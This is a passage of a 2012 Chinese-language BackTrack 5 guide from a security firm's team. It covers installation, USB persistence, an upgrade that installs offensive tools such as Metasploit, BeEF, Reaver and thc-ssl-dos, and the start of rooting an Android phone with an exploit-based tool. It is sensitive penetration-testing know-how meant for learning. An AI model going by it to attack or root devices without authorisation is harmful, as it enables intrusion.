Back track中文指南v9
Transcript of Back track中文指南v9
Neuron security team【N.S.T】 第1/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
版权所有,抄袭必究!
Backtrack 中文指南 V0.9
作者:何伊圣 [email protected]
二零一二年三月八日
蓝盾信息安全技术股份有限公司
Neuron security team【N.S.T】 第2/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
目 录
联系和反馈 .......................................................................................................................................... 6
序言 ...................................................................................................................................................... 7
旧前言 .................................................................................................................................................. 8
系统篇 .................................................................................................................................................. 9
第一章. BackTrack 介绍 ............................................................................................................ 10
第一节. 何为 backtrack? ................................................................................................... 10
第二节. backtrack 发展简介 ............................................................................................... 10
第三节. 下载 BackTrack ..................................................................................................... 14
第二章. BackTrack 安装 ............................................................................................................ 17
第一节. 光盘启动 ................................................................................................................ 17
第二节. 硬盘安装 ................................................................................................................ 21
第三节. U 盘安装1——UNetbootin ................................................................................... 29
第四节. U 盘安装2——Linux Live USB creator ............................................................... 31
第五节. U 盘安装3——Persistent ...................................................................................... 33
第六节. 升级安装最新版 .................................................................................................... 39
第三章. ARM 平台使用 ...................................................................................................... 41
第一节. ARM 介绍 .............................................................................................................. 41
第二节. 索爱 Xperia X10手机使用 backtrack ................................................................... 41
第三节. Motorola Xoom 平板电脑使用 backtrack ............................................................ 46
第四章. Backtrack 虚拟化 .......................................................................................................... 57
第一节. VMware 安装 backtrack ........................................................................................ 57
第二节. Backtrack5 R2安装 Vmware Tools ....................................................................... 58
第三节. Backtrack5 R1安装 Vmware Tools ....................................................................... 58
第四节. 手动安装 Vmware Tools ....................................................................................... 62
第五节. 升级 Vmware Tools ............................................................................................... 65
第六节. BackTrack 安装 VMware Workstation .................................................................. 67
第七节. Backtrack 安装 Virtual Box ................................................................................... 67
第八节. Backtrack 安装 VMware Player ............................................................................ 69
第九节. Virtual Box 安装 BackTrack ................................................................................. 70
第五章. BackTrack 上网 ............................................................................................................ 72
第一节. 自动获取 IP ........................................................................................................... 72
第二节. 临时设置 IP 地址 .................................................................................................. 75
第三节. 设置静态 IP 地址 .................................................................................................. 75
第四节. ADSL拨号设置 .................................................................................................... 78
第五节. 无线网络设置 ........................................................................................................ 83
第六章. BackTrack 汉化 ............................................................................................................ 87
第一节. BackTrack KDE 汉化 ........................................................................................... 87
第二节. BackTrack GNOME 汉化 ..................................................................................... 93
第三节. 系统语言环境设置 ................................................................................................ 98
第四节. 安装中文输入法 .................................................................................................... 99
Neuron security team【N.S.T】 第3/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第五节. ibus 自动启动 ...................................................................................................... 101
第六节. 云输入法 .............................................................................................................. 103
第七节. 更新 Firefox 版本 ................................................................................................ 103
第七章. Linux 基础 .................................................................................................................. 105
第一节. 常用的 apt 命令 ................................................................................................... 105
第二节. 常用的 dpkg 命令 ................................................................................................ 106
第三节. 如何查找帮助 ...................................................................................................... 107
第八章. BackTrack 基本使用 .................................................................................................. 107
第一节. 更改 root 密码 ..................................................................................................... 107
第二节. 创建普通用户 ...................................................................................................... 108
第三节. backtrack 自动登录到 KED 图形界面 ............................................................... 110
第四节. 更改登录画面 ...................................................................................................... 112
第五节. 更改启动画面 ...................................................................................................... 114
第六节. 更换桌面背景1 .................................................................................................... 116
第七节. 更换桌面背景2 .................................................................................................... 117
第八节. Backtrack 5 KDE 更改屏幕分辨率 .................................................................... 118
第九节. Backtrack 5 GNOME 更改屏幕分辨率 .............................................................. 120
第十节. 解决 GPG 错误 .................................................................................................... 122
第十一节. backtrack 5 R2启用 PEA ..................................................................................... 122
第十二节. 解决启动不了图形界面的问题 .......................................................................... 124
第十三节. BackTrack 安装 QQ ............................................................................................ 125
第十四节. 更改桌面文件夹 .................................................................................................. 127
第十五节. 准备内核头文件 .................................................................................................. 127
第十六节. 更新 backtrack ..................................................................................................... 131
工具篇 .............................................................................................................................................. 133
第一章. Web 安全工具 ............................................................................................................. 134
第一节. Wpscan ................................................................................................................. 134
第二章. Information Gathering 信息搜集工具 ........................................................................ 135
第一节. Network analysis- DNS analysis .......................................................................... 135
1. DNSWalk .................................................................................................................... 135
2. DNSTracer .................................................................................................................. 136
3. DNSEnum ................................................................................................................... 136
第二节. Network analysis- Identify live hosts................................................................... 138
1. 0trace ........................................................................................................................... 138
2. Fping ........................................................................................................................... 138
第三节. Network analysis- Route analysis ....................................................................... 139
1. Netenum ...................................................................................................................... 139
2. Protos .......................................................................................................................... 140
第四节. Network analysis- Network scanners ................................................................... 141
1. Autoscan...................................................................................................................... 141
2. NMAP ......................................................................................................................... 145
3. Zenmap........................................................................................................................ 145
4. Unicornscan ................................................................................................................ 146
第五节. Network analysis- SSL Analysis .......................................................................... 148
1. Sslscan ......................................................................................................................... 148
第三章. Vulnerability Assessment 漏洞检测工具 ................................................................... 151
第1节. Network assessment ............................................................................................. 151
Neuron security team【N.S.T】 第4/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
1. Cisco auditing tool ...................................................................................................... 151
2. Cisco global exploiter ................................................................................................. 151
3. Cisco OCS mass scanner............................................................................................. 152
4. Cisco password scanner .............................................................................................. 152
5. Copy router config ...................................................................................................... 152
6. Merge router config..................................................................................................... 152
第2节. Vulnerability Scanners 漏洞扫描工具 ................................................................ 152
1. Nessus ......................................................................................................................... 152
2. OpenVas ...................................................................................................................... 156
第四章. Exploitation Tools 漏洞利用工具 .............................................................................. 164
第一节. Network exploitation tools ................................................................................... 164
第二节. Social engineering tools ....................................................................................... 165
第五章. 无线安全工具 ............................................................................................................. 165
第一节. 网卡推荐 .............................................................................................................. 165
第二节. dmesg 命令介绍 .................................................................................................. 166
第三节. 网卡选择 .............................................................................................................. 166
第四节. 解决 rt2800usb 驱动问题 .................................................................................... 167
第五节. rtl8187驱动 .......................................................................................................... 167
第六节. r8187驱动 ............................................................................................................ 169
第七节. compat wireless 驱动 ........................................................................................... 169
第八节. WEP 密码破解 .................................................................................................... 170
第九节. WPA 密码破解(WPA TKIP PSK) .................................................................. 175
第十节. WPA 2 密码破解(WPA CCMP PSK) ............................................................. 176
第六章. Privilege Escalation 权限提升 .................................................................................... 179
第1节. Sniffer ................................................................................................................... 179
1. ettercap ........................................................................................................................ 179
第2节. BackTrack 启用 Cuda .......................................................................................... 182
第七章. Maintaining Access 维护访问工具 ............................................................................ 185
第八章. Reverse engineering 逆向工程工具 ........................................................................... 186
第九章. RFID 工具 ................................................................................................................... 186
第十章. Stress Testing 压力测试工具 ...................................................................................... 187
第十一章. Forensics 取证工具..................................................................................................... 187
第1节. 取证应用 .............................................................................................................. 187
第十二章. Reporting Tools 报告工具 .......................................................................................... 189
第十三章. Services 各种服务 ...................................................................................................... 190
第一节. 启动 SSHD 服务 .................................................................................................. 190
第二节. 启动 VNC 服务 ................................................................................................... 190
第三节. 启动 TFTP 服务................................................................................................... 190
第四节. 启动其他服务 ...................................................................................................... 190
第十四章. Miscellaneous 杂项工具 ............................................................................................. 191
第十五章. 常见的问题 ................................................................................................................. 192
Neuron security team【N.S.T】 第5/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第6/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
联系和反馈
你想及时的获得关于 backtrack 的资讯吗?以下链接可以帮助您:
收听新浪微博:
http://weibo.com/akast ;
收听腾讯微博:
http://t.qq.com/neuronst ;
关注博客:
http://akast.blog.com ;
官方论坛:
http://www.backtrack-linux.org/forums/ ;
官方下载:
http://www.backtrack-linux.org/downloads/ ;
邮件列表:
http://list.qq.com/cgi-bin/qf_invite?id=af9745adc3afe31959723a5d1cc24dd4676ffafc3cfdeca6
培训联系:
http://www.bluedon.com/training/feedback.html
QQ 群:
500人超级群:90848202、152984360 ;200人高级群:74293375 ;100人普通群:80756970;
或者直接联系我 Email 、Gtalk、QQ 都是:[email protected]
Neuron security team【N.S.T】 第7/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
序言
这份东西从原本想要写的一本书到了现在的这一份文档,其中记录了某些人的某些梦。你是否会觉
得在没有 backtrack 之前,很多小朋友是从没想过要去学习 Linux 的。所以在这里再次感谢 backtrack
让众多菜鸟爱上了 Linux。其实无论是 KDE、Fluxbox 还是 GNOME,都只是一种图形界面而已,本指南还
是以 KDE为主,为照顾菜鸟朋友,也加上了部分 GNOME的内容。
时间一晃过去,BackTrack 5终于也出来了,变得更加方便和更加强大了。我觉得 backtrack 这次最
大的改变是加了 ARM 的镜像包,这使得 backtrack 可以安装在任何使用 ARM 处理器的平板电脑、智能手
机上面,甚至智能电视机都可以安装,这也就使得黑客发起网络攻击更加灵活,而且可以快速移动攻击
位置,anywhere,anytime。从而也就加大了司法取证的难度。这些都是我们信息安全领域中不得不研究
的问题。
对于破解无线网络密码的行为,这当然是不对的,但我们也不必投于鄙视的眼光,我们要做的是如
何加强无线网络的安全。最后感谢旺财(Kevin2600)、bite[N.S.T]、azone[N.S.T]、Jarett [N.S.T]等
人的建议和帮助。
Akast [N.S.T] Courage, strength, determination!
Neuron security team【N.S.T】 第8/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
旧前言
关于写 BackTrack 入门指南这本书的想法已经很久了,想归想却一直没有开始,在这期间
BackTrack 从4到了 R1又到了 R2不断地在改进,而我的想法还是停留在大脑里面。主要还是由于工作的
原因吧,最近调整了工作之后也终于下决心开始了。本来是想写一本书的,由于懒的原因吧,所以还是
作为电子版免费发了出来了,内容当然也简了很多,有部分内容是翻译 BackTrack WIKI里面的。
在2009年10月份,也是我到蓝盾公司刚转正的时候吧,我用“古典娃娃”这个笔名写过一份
《BackTrack4基础教程简体版》,大家可以到百度文库或者豆丁网去找找,这是一份很简单很简单的教
程。
我之前一直都存在一个矛盾,就是到底需不需要写这么简单的入门教程,会不会被高手鄙视呢。现
在我终于想明白了,就算再简单也是需要写的。就像我们读过了小学,但还是需要开办小学,因为永远
都会有新的小朋友需要读小学。或者说就好比我们学会了输入法,但还是有别人需要学习输入法的。技
术的高低只是一个过程,没有可鄙视的理由。
说明一:BackTrack不仅仅是用来破解无线密码的,它除了包含无线方面的安全工具之外,还有集合
了密码枚举、加密隧道、密码猜解、欺骗、 踩点、思科、Web、取证、Fuzzers、 蓝牙、 嗅探、 VoIP、调
试、 渗透、 数据库、RFID、Python、驱动程序、 GPU 等等几乎全面的安全工具。
说明二:BackTrack是一个操作系统,只是在这个系统里面集合了各种安全工具而已。大家可以自己
选择其他的 Linux来安装这些工具效果都是一样的,比如您可以安装一个中文的 ubuntu,然后在 ubuntu
里面安装您想要的安全工具。
说明三:如果您只想破解无线密码,那么您使用 Windows也一样可以破解,Windows也有相应的破解
软件。如果 BackTrack只用来破解无线密码,那太大材小用了。
Akast Saint H
勇气、力量、决心! Courage, strength, determination!
Neuron security team【N.S.T】 第9/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
系统篇
Neuron security team【N.S.T】 第10/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第一章. BackTrack 介绍
第一节. 何为 backtrack?
在生活中不论我们做什么,都需要一种精神上的寄托,所以我们有了不同的信仰,hack 也一样。
何为渗透?鼓其勇,练其力,心要决、耐、细,往你欲之地,取你望之物,所谓之渗透之道也。
BackTrack中文可谓之“回溯”,它的基本思想是:从问题的某一种状态(初始状态)出发,搜索从
这种状态出发所能达到的所有“状态”,当一条路走到“尽头”的时候(不能 再前进),再后退一步或若
干步,从另一种可能“状态”出发,继续搜索,直到所有的“路径”(状态)都试探过。这种不断前进、
不断“回溯”寻找解的方法,就称作“回溯法”,
回溯采用试错的思想,它尝试分步的去解决一个问题。在分步解决问题的过程中,当它通过尝试发
现现有的分步答案不能得到有效的正确的解答的时候,它将取消上一步甚至是上几步的计算,再通过其
它的可能的分步解答再次尝试寻找问题的答案。回溯法通常用最简单的递归方法来实现,在反复重复上
述的步骤后可能出现两种情况:
一、找到一个可能存在的正确的答案。
二、在尝试了所有可能的分步方法后宣告该问题没有答案。
三、在最坏的情况下,回溯会导致一次复杂度为指数时间的计算。
这也就是渗透之道。So this is BackTrack,and never say give up,just hacking!窗外的世界更
加美丽,欢迎大家来到 BackTrack 世界。也许 hack 是一个没有尽头的世界,我们的生活就是一直在
BackTrack中轮回。
第二节. backtrack 发展简介
早期 BackTrack是基于 SLAX 的自启动运行光盘,BackTrack 4改为使用 Ubuntu做基础平台了,可以
作为 live usb 或 live cd 的 Linux 发行版,方便使用。BackTrack 前身是 Auditor Security Live
CD,大约形成于2004 年,后来整合了 WHAX(先前的 Whoppix)而成的。
其实类似的操作系统还有 WiFiSlax、Wifiway、nUbuntu、SkyRidr、PHLAK、slitaz、mpentoo、
NodeZero、REMnux、Security Onion、OWASP livecd、backbox等,另外还有很多不知名的,但是实际上
有一个专业的团队在维护和持续更新,而且功能全面的就只有 backtrack了,本指南是介绍 backtrack
的,所以就不费篇章去谈其他系统了,读者有兴趣的话可以自己 Google一下。
2006 年5 月26 日,BackTrack 第一版面世,
2007 年3 月6 日,发布 BackTrack 第二版,
Neuron security team【N.S.T】 第11/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
2008 年6 月19 日,发布 BackTrack 第三版,
2010 年11月22 日,发布 BackTrack 第四版,
2011 年5 月10 日,发布 BackTrack 第五版。
2011 年8 月10 日,发布 BackTrack第五版 R1。
(图1)
Neuron security team【N.S.T】 第12/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图2)
(图3)
Neuron security team【N.S.T】 第13/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图4)
(图5)
Neuron security team【N.S.T】 第14/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第三节. 下载 BackTrack
Backtrack 5的下载页面增加了一个简单的注册窗口,虽然在这里注册不是必需的,但我们一定会会
很感激您的注册,因为这让我们当 backtrack有重要更新或新闻的时候能够及时提醒您。
BackTrack官方下载地址:http://www.BackTrack-linux.org/downloads/,Backtrack 5有 GNOME、
KDE 等界面和32位、64位和 ARM等架构,以表格将帮助您选择适合您的版本。
图形界面 架构 镜像格式 下载方式
GNOME 32位 VMWare、ISO Torrent
GNOME 64位 ISO Torrent
GNOME ARM IMG Torrent
KDE 32位、64位 ISO Torrent
BackTrack 5下载了之后,为了保证安全,建议您先检查一下 MD5值是否对应。如果检查的结果和官
方公布的 MD5值一致的话,那么就说明您下载的文件包没有被非法篡改过。
Linux系统下面检查 MD5值可以直接使用 md5sum 这个命令。
Windows下面可以使用 hashcalc 这个小工具来检查。
Mac OS X在控制台中使用 MD5命令来检查。
root@bt:~# md5sum bt5-kde-32.iso
4150643026d292717f77ebb83948a034 bt5-kde-32.iso
root@bt:~#
MD5 (~/Downloads/bt5-kde-32.iso) = 4150643026d292717f77ebb83948a034
BT5-KDE-64.torrent KDE 64bit md5sum: 80d65610de90ac7ede49b9f7935dfdd2
BT5-KDE-32.torrent KDE 32bit md5sum: 4150643026d292717f77ebb83948a034
BT5-GNOME-64.torrent GNOME 64bit md5sum: 75c4e7a969abc873d9e085656b156345
BT5-GNOME-32.torrent GNOME 32bit md5sum: b01a93a916fabb6d1640bd0054428e17
Neuron security team【N.S.T】 第15/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第16/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图7)
Neuron security team【N.S.T】 第17/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第二章. BackTrack 安装
第一节. 光盘启动
使用 BackTrack 5有多种方法,如 ARM 智能手机、ARM 平板电脑、VM 虚拟机、USB 启动、硬盘安装和
光盘启动。
下载完毕之后,接下来就是安装了。我们可以选择刻录一个 BackTrack 的系统盘,然后在用这个系
统盘来安装它。选择 DVD光盘来刻录。
(图10)
Neuron security team【N.S.T】 第18/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图11)
我用 ImgBurn 这个免费的刻录软件,刻录过程非常简单,大家看图吧。刻录成功之后,接着重启电
脑,然后在 BIOS 里面设置从光驱启动,我们就可以使用这张 BT 系统盘来启动了。使用光盘启动之后,
我们看到的第一个界面如,有九个选项。前七个选项都是启动 BackTrack 的,除了 forensics(no swap)
这个取证模式之外,其他的都差不多了,都是先进入字符界面,然后都可以使用 startx 命令进入图形界
面。
默认的用户名是:root
默认的用户名是:toor
BackTrack Text ——字符模式,默认启动项。
BackTrack Stealth ——无网模式,不能上网。
BackTrack Forensics ——取证模式,不使用硬盘和交换分区。
BackTrack noDRM ——无 DRM 驱动模式。
Backtrack Debug ——安全模式,调试 backtrack 系统。
Backtrack Memtest ——内存测试。
Hard Drive Boot ——从第一块硬盘启动其他系统。
(图12)
Neuron security team【N.S.T】 第19/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图13)
Neuron security team【N.S.T】 第20/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第21/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第二节. 硬盘安装
进入图形界面之后,您可以继续使用 BackTrack,也可以进行硬盘安装。
您可以看到桌面上有一个 install.sh 文件,这个是一个 shell 脚本安装文件,顾名思义我们都可以猜到
是安装某东西的脚本了,它就是把 BackTrack 系统安装到硬盘的脚本文件,单击运行它,就可以开始傻瓜
化的安装了。
接下来的过程和安装其他 Linux 系统一样,选择我们的所在地区,可以直接在地图上面点,也可以在
“selected city”的下拉列表中选择,我这里选择了比较近的香港。然后选择键盘布局,接下来是硬盘分
区,由于我这里是在虚拟机中的截图,所以选择了所有空间。
如果硬盘上没有其他系统,那就直接进行安装,如果还有其他系统的话,那么就选择“manual”进
行手动分区(图19),但是事先要划分一个20G 左右的空分区出来给 BackTrack 使用,选择“manual”之
后,在空的分区上划分2048KB 左右的空间给 swap 交换空间,剩下的给/根分区就行了。
安装完毕之后,BackTrack 会提示您继续使用 live CD 还是重启电脑。重启就可以通过硬盘来启动
了,就不需要光盘了,把光盘从光驱中取出。如果硬盘上有多个系统,BackTrack 会自动设置由 Grub 来
引导,选择您要用的系统。
(图15)
Neuron security team【N.S.T】 第22/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图16)
(图17)
Neuron security team【N.S.T】 第23/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
最的后26G 的分区是用来安装 backtrack 的,2.9G 是给 backtrack 用作交换分区。
(图18)我160G 的硬盘上的 C盘已经有一个 win 7了,要用另外一个空分区来安装 backtrack。
Neuron security team【N.S.T】 第24/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
选择 specify partitions manually (advanced)手动设置
我这里建立了一个20多 G 的 EXT4格式的分区来安装 backtrack
Neuron security team【N.S.T】 第25/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
另外创建一个3G 多的 SWAP 交换分区
分区好了,结果如上图,ext4和 swap 是 backtrack 用的,其他分区都是 win7用。
Neuron security team【N.S.T】 第26/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图19)
(图20)
Neuron security team【N.S.T】 第27/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图21)
Windows 7和 backtrack 5双系统的启动界面
Neuron security team【N.S.T】 第28/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第29/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第三节. U 盘安装1——UNetbootin
如果大家觉得使用光盘或者硬盘都不够方便的话,那还有一种方法可供选择,就是把 BackTrack 安装
到您的 U 盘里面。安装 U 盘系统有很多种方法。
BackTrack 官方推荐 U 盘最少要4G 的容量。把 U 盘格式化为 FAT32文件格式。接着大家再下载一个
小工具 UNetbootin,官方下载点:http://unetbootin.sourceforge.net/ 。这个 UNetbootin 可以在 Windows 下
面使用,也可以在 Linux 下面使用。
打开 UNetbootin,在 disk image 选项里面选择 BackTrack 的 ISO 文件。然后在最下面的 drive 里面选
择您的 U 盘,点击 OK,就开始制作 U 盘的 BackTrack 系统了。制作完成之后,使用和光盘一样,先要设
置 BIOS 从 USB 盘启动,用户密码一样是 root和 toor。
Neuron security team【N.S.T】 第30/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第31/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第四节. U 盘安装2——Linux Live USB creator
介绍第二种安装 U盘 BackTrack的方法,我们先要下载另外一个小工具:Linux Live USB creator。官
方下载地址:http://www.linuxliveusb.com/en/download 。建议使用 4G 或 8G 的 U 盘,和第一种方法一
样,先要把 U 盘格式化为 FAT32 的文件格式。
1.第一步 选择您的 U盘.
(图28)
2. 第二步 选择您下载了的 BackTrack ISO文件包,在这步可能会有一个提示,您可以忽略它继续就行
了。
Neuron security team【N.S.T】 第32/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
(图29)
(图30)
3. 第三步 选择您要用来安装系统的 U盘空间大小。
(图31)
4. 第四步 有 3个选项,第一个是否在 U盘上面隐藏创建的文件,第二个是把 U盘格式化为 FAT32文件
格式,第三个是允许在 Windows下面运行 Linux live。如果您之前已经格式化了,那么在这里我们只要
选上第一和第三就行了。
(图32)
5. 第五步 点击“闪电”图标开始安装。完成之后就可以使用该 U盘启动 BackTrack了。
(图33)
Neuron security team【N.S.T】 第33/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第五节. U 盘安装3——Persistent
需要至少有8G的未用空间的 U盘。
分区工作
使用下面的命令来查看可用的 U盘,并且决定好要把 BT5装到哪一个 U盘上去。
dmesg | egrep hd.\|sd.
保存设置的 U盘需要满足下面条件:
第一分区必须是一个大小至少为 2.5G的 vfat主分区,并且该分区要设置为活动,避免引导问题。
第二分区大小为 U盘上剩下的所有空间。
使用下面的命令来对 U盘进行分区
fdisk /dev/sdb
记得使用你自己系统中正确的 U盘盘符,首先删除所有的分区:
Command (m for help): d (表示删除)
Partition number (1-4): 1 (删除第一个分区)
建立第一个分区:
Neuron security team【N.S.T】 第34/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Command (m for help): n (新建分区)
Command action
e extended
p primary partition (1-4)
p (第一个是主分区,因此选 p)
Partition number (1-4): 1 (第1个分区)
First cylinder (1-522, default 1): (使用默认值,直接回车)
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-522, default 522): +2500M (大小,2.5G)
建立第二个分区
Command (m for help): n (新建分区)
Command action
e extended
p primary partition (1-4)
p (同样选主分区)
Partition number (1-4): 2 (第二个分区)
First cylinder (193-522, default 193): (使用默认值,直接回车)
Using default value 193
Last cylinder, +cylinders or +size{K,M,G} (193-522, default 522): (使用默认值,直接回车)
Using default value 522
把第一个分区设置为 vfat/fat32文件系统
Command (m for help): t
Partition number (1-4): 1
Hex code (type L to list codes): b
Changed system type of partition 1 to b (W95 FAT32)
把第二分区变成 Linux分区
Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 83
把第一分区设置为活动
Command (m for help): a
Partition number (1-4): 1
Command (m for help): w
Neuron security team【N.S.T】 第35/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第36/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
格式化分区
mkfs.vfat -F 32 -n BT5-NST /dev/sdb1
mkfs.ext3 -b 4096 -L casper-rw /dev/sdb2
Neuron security team【N.S.T】 第37/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
把 BT5装到 U盘上去
转到 U盘的目录,把 backtrack ISO中的文件全部复制进去,其实你在 Windows下面复制也一样。
cd /media/BT5-NST/
rsync -r /media/cdrom0/* . //复制文件,需要耐心等待。
设置持久性存储
为了使设置能保存下来,我们需要做下面两步:
把默认启动项设置为持久性存储.
为我们的 UI设置分辨率.
cd /mnt/sdb1/boot/grub
vi menu.lst
打开文件后,把'default'改成"default 4",并且加上"vga=0x317"来把分辨率设置为1024x768。
# By default, boot the first entry.
default 4
.
.
.
title Start Persistent Live CD
kernel /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet vga=0x317
initrd /boot/initrd.gz
:wq
Neuron security team【N.S.T】 第38/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
你的 menu.lst应该改成这样:
# By default, boot the first entry.
default 4
# Boot automatically after 30 secs.
timeout 30
splashimage=/boot/grub/bt4.xpm.gz
title Start BackTrack FrameBuffer (1024x768)
kernel /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317
initrd /boot/initrd.gz
title Start BackTrack FrameBuffer (800x600) 35/138
www.bluedon.com A20
kernel /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x314
initrd /boot/initrd800.gz
title Start BackTrack Forensics (no swap)
kernel /boot/vmlinuz BOOT=casper boot=casper nopersistent rw vga=0x317
initrd /boot/initrdfr.gz
title Start BackTrack in Safe Graphical Mode
kernel /boot/vmlinuz BOOT=casper boot=casper xforcevesa rw quiet
initrd /boot/initrd.gz
Neuron security team【N.S.T】 第39/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
title Start Persistent Live CD
kernel /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet vga=0x317
initrd /boot/initrd.gz
title Start BackTrack in Text Mode
kernel /boot/vmlinuz BOOT=casper boot=casper nopersistent textonly rw quiet
initrd /boot/initrd.gz
title Start BackTrack Graphical Mode from RAM
kernel /boot/vmlinuz BOOT=casper boot=casper toram nopersistent rw quiet
initrd /boot/initrd.gz
title Memory Test
kernel /boot/memtest86+.bin
title Boot the First Hard Disk
root (hd0)
chainloader +1
重启你的系统并且选择 "Start Persistent Live CD" 或者让系统自动选择默认项启动. 为了测试
设置是否有效,你可以创建一个文件试试,如果重启后文件还在,说明在 U盘上保存设置成功了。
第六节. 升级安装最新版
目前 backtrack 的最新版本5 R2体积比较大,没必要重新下载的,直接从 R1更新就行了,更新中有
提问的就直接回车,使用默认选项,更新完重启系统即可。
root@bt:~# echo "deb http://updates.repository.backtrack-linux.org revolution
main microverse non-free testing" >> /etc/apt/sources.list
root@bt:~# apt-get update
root@bt:~# apt-get dist-upgrade
root@bt:~# apt-get install pipal findmyhash metasploit joomscan hashcat-gui go-
lismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e
dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino re-
bind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-
audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef beef
root@bt:~# fix-splash
root@bt:~# reboot
Neuron security team【N.S.T】 第40/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
最后可以禁用一些没用的服务。
/etc/init.d/apache2 stop
/etc/init.d/cups stop
/etc/init.d/winbind stop
update-rc.d -f cups remove
update-rc.d -f apache2 remove
update-rc.d -f winbind remove
Neuron security team【N.S.T】 第41/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第三章. ARM 平台使用
第一节. ARM 介绍
ARM(Advanced RISC Machines)处理器是 Acorn计算机有限公司面向低预算市场设计的第一款 RISC
微处理器。更早称作 Acorn RISC Machine)。ARM处理器本身是32位设计,但也配备16位指令集。
微软公司(2011年)宣布,下一版 Windows将正式支持 ARM处理器。还有传言苹果 Mac明年开始 ARM
化,这是计算机工业 arm处理器发展历史上的一件大事,标识着 x86处理器的主导地位发生动摇。
目前绝大部分的智能手机产品都是基于 ARM架构的处理器芯片,有诺基亚、摩托罗拉、索爱、三
星、奔迈等众多智能手机厂商使用着 ARM处理器,如 iPhone、iPad、还有国内黑客界知名的 N900用的处
理器就是 ARM。
经过上面的简单介绍,我想大家应该都了解啦,就是 backtrack 5可以安装在使用 ARM处理器的智能
手机或平板电脑上了。不过很多时候我们其实没必要把 backtrack装到手机里面,我们只需要把需要用
到的工具装到手机里即可。我推荐爱好使用手机做渗透的朋友们安装以下工具就差不多足够了。
#sudo gainroot
#apt-get install wget subversion python ruby ruby1.8 irb1.8 rdoc1.8 libopenssl-
ruby1.8 ettercap-ng tcpdump aircrack-ng nmap kismet wireshark macchanger socat
#svn co http://svn.secmaniac.com/social_engineering_tookit set/
#svn co http://svn.secmaniac.com/fasttrack fasttrack/
第二节. 索爱 Xperia X10手机使用 backtrack
1. Android 系统提权
本文用来演示的手机是索爱 XPERIA x10i,要用它来安装 backtrack,先要获得 Android
系统的 root 权限,提权原理也是用 Linux 内核提权漏洞来获得 root 权限的,下面是手机的一
些基本信息。
这里使用的提权工具是 SuperOneClickv2.2-ShortFuse,大家可以到工具官网:
手机型号:X10i
Android 版本:2.3.3
基带版本:2.1.71
内核版本:2.6.29-00054-g5f01537 SEMCUser@SEMCHost #1
版本号:3.0.1.G.0.75
Neuron security team【N.S.T】 第42/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
https://shortfuse.org 下载,下面是提权的步骤:
1、先要在电脑上安装手机的 USB 驱动,所以到索爱官网下载一个管理软件:http://dl-
www.sonyericsson.com/cws/download/1/786/189/1320055975/Sony_Ericsson_PC_Companion_2.0
1.231_Web.exe,其他的根据你的手机型号和电脑操作系统来选择相应的软件。
2、到 https://shortfuse.org 下载最新版本的提权工具,名称是 SuperOneClick。
3、把手机关机,取出手机中的 SD 卡,然后开机,到手机的“设置”-“应用程序”-“开
发”-“USB 调试”中关掉 USB 调试功能,
4、手机使用 USB 连接电脑,打开 SuperOneClick,点击工具界面上的“Root”。
5、看到 SuperOneClick 出现这两条信息:* daemon not running. starting it now on port 5037 *
